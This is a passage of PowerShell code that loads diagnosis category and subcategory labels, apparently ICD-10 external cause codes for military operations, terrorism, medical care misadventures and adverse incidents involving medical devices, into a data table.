$DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, military personnel","Military operations involving unintentional restriction of air and airway, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, military personnel","Military operations involving unintentional restriction of air and airway, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, civilian","Military operations involving unintentional restriction of air and airway, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, civilian","Military operations involving unintentional restriction of air and airway, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, civilian","Military operations involving unintentional restriction of air and airway, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, military personnel","Military operations involving other forms of conventional warfare, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, military personnel","Military operations involving other forms of conventional warfare, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, military personnel","Military operations involving other forms of conventional warfare, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, civilian","Military operations involving other forms of conventional warfare, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, civilian","Military operations involving other forms of conventional warfare, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other forms of conventional warfare, civilian","Military operations involving other forms of conventional warfare, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, military personnel","Military operations involving unspecified effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, military personnel","Military operations involving unspecified effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, military personnel","Military operations involving unspecified effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, civilian","Military operations involving unspecified effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, civilian","Military operations involving unspecified effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified effect of nuclear weapon, civilian","Military operations involving unspecified effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, military personnel","Military operations involving direct blast effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, military personnel","Military operations involving direct blast effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, military personnel","Military operations involving direct blast effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, civilian","Military operations involving direct blast effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, civilian","Military operations involving direct blast effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving direct blast effect of nuclear weapon, civilian","Military operations involving direct blast effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, military personnel","Military operations involving indirect blast effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, military personnel","Military operations involving indirect blast effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, military personnel","Military operations involving indirect blast effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, civilian","Military operations involving indirect blast effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, civilian","Military operations involving indirect blast effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving indirect blast effect of nuclear weapon, civilian","Military operations involving indirect blast effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, military personnel","Military operations involving thermal radiation effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, military personnel","Military operations involving thermal radiation effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, military personnel","Military operations involving thermal radiation effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, civilian","Military operations involving thermal radiation effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, civilian","Military operations involving thermal radiation effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving thermal radiation effect of nuclear weapon, civilian","Military operations involving thermal radiation effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, military personnel","Military operation involving nuclear radiation effects of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, military personnel","Military operation involving nuclear radiation effects of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, military personnel","Military operation involving nuclear radiation effects of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, civilian","Military operation involving nuclear radiation effects of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, civilian","Military operation involving nuclear radiation effects of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving nuclear radiation effects of nuclear weapon, civilian","Military operation involving nuclear radiation effects of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, military personnel","Military operation involving other effects of nuclear weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, military personnel","Military operation involving other effects of nuclear weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, military personnel","Military operation involving other effects of nuclear weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, civilian","Military operation involving other effects of nuclear weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, civilian","Military operation involving other effects of nuclear weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operation involving other effects of nuclear weapons, civilian","Military operation involving other effects of nuclear weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, military personnel","Military operations involving biological weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, military personnel","Military operations involving biological weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, military personnel","Military operations involving biological weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, civilian","Military operations involving biological weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, civilian","Military operations involving biological weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving biological weapons, civilian","Military operations involving biological weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, military personnel","Military operations involving chemical weapons and other forms of unconventional warfare, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, military personnel","Military operations involving chemical weapons and other forms of unconventional warfare, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, military personnel","Military operations involving chemical weapons and other forms of unconventional warfare, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, civilian","Military operations involving chemical weapons and other forms of unconventional warfare, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, civilian","Military operations involving chemical weapons and other forms of unconventional warfare, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving chemical weapons and other forms of unconventional warfare, civilian","Military operations involving chemical weapons and other forms of unconventional warfare, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations, unspecified","Military operations, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations, unspecified","Military operations, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations, unspecified","Military operations, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified weapon of mass destruction [WMD]","Military operations involving unspecified weapon of mass destruction [WMD], initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified weapon of mass destruction [WMD]","Military operations involving unspecified weapon of mass destruction [WMD], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified weapon of mass destruction [WMD]","Military operations involving unspecified weapon of mass destruction [WMD], sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving friendly fire","Military operations involving friendly fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving friendly fire","Military operations involving friendly fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving friendly fire","Military operations involving friendly fire, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, public safety official injured","Terrorism involving explosion of marine weapons, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, public safety official injured","Terrorism involving explosion of marine weapons, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, public safety official injured","Terrorism involving explosion of marine weapons, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, civilian injured","Terrorism involving explosion of marine weapons, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, civilian injured","Terrorism involving explosion of marine weapons, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, civilian injured","Terrorism involving explosion of marine weapons, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, terrorist injured","Terrorism involving explosion of marine weapons, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, terrorist injured","Terrorism involving explosion of marine weapons, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving explosion of marine weapons, terrorist injured","Terrorism involving explosion of marine weapons, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, public safety official injured","Terrorism involving destruction of aircraft, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, public safety official injured","Terrorism involving destruction of aircraft, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, public safety official injured","Terrorism involving destruction of aircraft, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, civilian injured","Terrorism involving destruction of aircraft, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, civilian injured","Terrorism involving destruction of aircraft, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, civilian injured","Terrorism involving destruction of aircraft, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, terrorist injured","Terrorism involving destruction of aircraft, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, terrorist injured","Terrorism involving destruction of aircraft, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving destruction of aircraft, terrorist injured","Terrorism involving destruction of aircraft, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, public safety official injured","Terrorism involving other explosions and fragments, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, public safety official injured","Terrorism involving other explosions and fragments, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, public safety official injured","Terrorism involving other explosions and fragments, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, civilian injured","Terrorism involving other explosions and fragments, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, civilian injured","Terrorism involving other explosions and fragments, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, civilian injured","Terrorism involving other explosions and fragments, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, terrorist injured","Terrorism involving other explosions and fragments, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, terrorist injured","Terrorism involving other explosions and fragments, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other explosions and fragments, terrorist injured","Terrorism involving other explosions and fragments, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, public safety official injured","Terrorism involving fires, conflagration and hot substances, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, public safety official injured","Terrorism involving fires, conflagration and hot substances, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, public safety official injured","Terrorism involving fires, conflagration and hot substances, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, civilian injured","Terrorism involving fires, conflagration and hot substances, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, civilian injured","Terrorism involving fires, conflagration and hot substances, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, civilian injured","Terrorism involving fires, conflagration and hot substances, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, terrorist injured","Terrorism involving fires, conflagration and hot substances, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, terrorist injured","Terrorism involving fires, conflagration and hot substances, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving fires, conflagration and hot substances, terrorist injured","Terrorism involving fires, conflagration and hot substances, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, public safety official injured","Terrorism involving firearms, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, public safety official injured","Terrorism involving firearms, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, public safety official injured","Terrorism involving firearms, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, civilian injured","Terrorism involving firearms, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, civilian injured","Terrorism involving firearms, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, civilian injured","Terrorism involving firearms, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, terrorist injured","Terrorism involving firearms, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, terrorist injured","Terrorism involving firearms, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving firearms, terrorist injured","Terrorism involving firearms, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, public safety official injured","Terrorism involving nuclear weapons, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, public safety official injured","Terrorism involving nuclear weapons, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, public safety official injured","Terrorism involving nuclear weapons, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, civilian injured","Terrorism involving nuclear weapons, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, civilian injured","Terrorism involving nuclear weapons, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, civilian injured","Terrorism involving nuclear weapons, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, terrorist injured","Terrorism involving nuclear weapons, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, terrorist injured","Terrorism involving nuclear weapons, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving nuclear weapons, terrorist injured","Terrorism involving nuclear weapons, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, public safety official injured","Terrorism involving biological weapons, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, public safety official injured","Terrorism involving biological weapons, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, public safety official injured","Terrorism involving biological weapons, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, civilian injured","Terrorism involving biological weapons, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, civilian injured","Terrorism involving biological weapons, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, civilian injured","Terrorism involving biological weapons, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, terrorist injured","Terrorism involving biological weapons, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, terrorist injured","Terrorism involving biological weapons, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving biological weapons, terrorist injured","Terrorism involving biological weapons, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, public safety official injured","Terrorism involving chemical weapons, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, public safety official injured","Terrorism involving chemical weapons, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, public safety official injured","Terrorism involving chemical weapons, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, civilian injured","Terrorism involving chemical weapons, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, civilian injured","Terrorism involving chemical weapons, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, civilian injured","Terrorism involving chemical weapons, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, terrorist injured","Terrorism involving chemical weapons, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, terrorist injured","Terrorism involving chemical weapons, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving chemical weapons, terrorist injured","Terrorism involving chemical weapons, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving unspecified means","Terrorism involving unspecified means, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving unspecified means","Terrorism involving unspecified means, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving unspecified means","Terrorism involving unspecified means, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, public safety official injured","Terrorism involving suicide bomber, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, public safety official injured","Terrorism involving suicide bomber, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, public safety official injured","Terrorism involving suicide bomber, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, civilian injured","Terrorism involving suicide bomber, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, civilian injured","Terrorism involving suicide bomber, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving suicide bomber, civilian injured","Terrorism involving suicide bomber, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, public safety official injured","Terrorism involving other means, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, public safety official injured","Terrorism involving other means, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, public safety official injured","Terrorism involving other means, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, civilian injured","Terrorism involving other means, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, civilian injured","Terrorism involving other means, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, civilian injured","Terrorism involving other means, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, terrorist injured","Terrorism involving other means, terrorist injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, terrorist injured","Terrorism involving other means, terrorist injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism involving other means, terrorist injured","Terrorism involving other means, terrorist injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, public safety official injured","Terrorism, secondary effects, public safety official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, public safety official injured","Terrorism, secondary effects, public safety official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, public safety official injured","Terrorism, secondary effects, public safety official injured, sequela") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, civilian injured","Terrorism, secondary effects, civilian injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, civilian injured","Terrorism, secondary effects, civilian injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Terrorism, secondary effects, civilian injured","Terrorism, secondary effects, civilian injured, sequela") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during surgical operation") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during infusion or transfusion") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during kidney dialysis and other perfusion") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during injection or immunization") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during endoscopic examination") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during heart catheterization") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during aspiration, puncture and other catheterization") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during other surgical and medical care") + $null = $DiagnosisList.Rows.Add("Failure of sterile precautions during surgical and medical care","Failure of sterile precautions during unspecified surgical and medical care") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Excessive amount of blood or other fluid given during transfusion or infusion") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Incorrect dilution of fluid used during infusion") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Overdose of radiation given during therapy") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Inadvertent exposure of patient to radiation during medical care") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Failure in dosage in electroshock or insulin-shock therapy") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Inappropriate temperature in local application and packing") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Underdosing and nonadministration of necessary drug, medicament or biological substance") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Failure in dosage during other surgical and medical care") + $null = $DiagnosisList.Rows.Add("Failure in dosage during surgical and medical care","Failure in dosage during unspecified surgical and medical care") + $null = $DiagnosisList.Rows.Add("Contaminated medical or biological substances","Contaminated medical or biological substance, transfused or infused") + $null = $DiagnosisList.Rows.Add("Contaminated medical or biological substances","Contaminated medical or biological substance, injected or used for immunization") + $null = $DiagnosisList.Rows.Add("Contaminated medical or biological substances","Contaminated medical or biological substance administered by other means") + $null = $DiagnosisList.Rows.Add("Contaminated medical or biological substances","Contaminated medical or biological substance administered by unspecified means") + $null = $DiagnosisList.Rows.Add("Other misadventures during surgical and medical care","Mismatched blood in transfusion") + $null = $DiagnosisList.Rows.Add("Other misadventures during surgical and medical care","Wrong fluid used in infusion") + $null = $DiagnosisList.Rows.Add("Other misadventures during surgical and medical care","Failure in suture or ligature during surgical operation") + $null = $DiagnosisList.Rows.Add("Other misadventures during surgical and medical care","Endotracheal tube wrongly placed during anesthetic procedure") + $null = $DiagnosisList.Rows.Add("Other misadventures during surgical and medical care","Failure to introduce or to remove other tube or instrument") + $null = $DiagnosisList.Rows.Add("Performance of wrong procedure (operation)","Performance of wrong procedure (operation) on correct patient") + $null = $DiagnosisList.Rows.Add("Performance of wrong procedure (operation)","Performance of procedure (operation) on patient not scheduled for surgery") + $null = $DiagnosisList.Rows.Add("Performance of wrong procedure (operation)","Performance of correct procedure (operation) on wrong side or body part") + $null = $DiagnosisList.Rows.Add("Other specified misadventures during surgical and medical care","Other specified misadventures during surgical and medical care") + $null = $DiagnosisList.Rows.Add("Nonadministration of surgical and medical care","Nonadministration of surgical and medical care") + $null = $DiagnosisList.Rows.Add("Unspecified misadventure during surgical and medical care","Unspecified misadventure during surgical and medical care") + $null = $DiagnosisList.Rows.Add("Anesthesiology devices associated with adverse incidents","Diagnostic and monitoring anesthesiology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Anesthesiology devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative anesthesiology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Anesthesiology devices associated with adverse incidents","Prosthetic and other implants, materials and accessory anesthesiology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Anesthesiology devices associated with adverse incidents","Surgical instruments, materials and anesthesiology devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Anesthesiology devices associated with adverse incidents","Miscellaneous anesthesiology devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Cardiovascular devices associated with adverse incidents","Diagnostic and monitoring cardiovascular devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Cardiovascular devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative cardiovascular devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Cardiovascular devices associated with adverse incidents","Prosthetic and other implants, materials and accessory cardiovascular devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Cardiovascular devices associated with adverse incidents","Surgical instruments, materials and cardiovascular devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Cardiovascular devices associated with adverse incidents","Miscellaneous cardiovascular devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Otorhinolaryngological devices associated with adverse incidents","Diagnostic and monitoring otorhinolaryngological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Otorhinolaryngological devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative otorhinolaryngological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Otorhinolaryngological devices associated with adverse incidents","Prosthetic and other implants, materials and accessory otorhinolaryngological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Otorhinolaryngological devices associated with adverse incidents","Surgical instruments, materials and otorhinolaryngological devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Otorhinolaryngological devices associated with adverse incidents","Miscellaneous otorhinolaryngological devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Gastroenterology and urology devices associated with adverse incidents","Diagnostic and monitoring gastroenterology and urology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Gastroenterology and urology devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative gastroenterology and urology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Gastroenterology and urology devices associated with adverse incidents","Prosthetic and other implants, materials and accessory gastroenterology and urology devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Gastroenterology and urology devices associated with adverse incidents","Surgical instruments, materials and gastroenterology and urology devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Gastroenterology and urology devices associated with adverse incidents","Miscellaneous gastroenterology and urology devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("General hospital and personal-use devices associated with adverse incidents","Diagnostic and monitoring general hospital and personal-use devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General hospital and personal-use devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative general hospital and personal-use devices associated with adverse incidents") + $null = 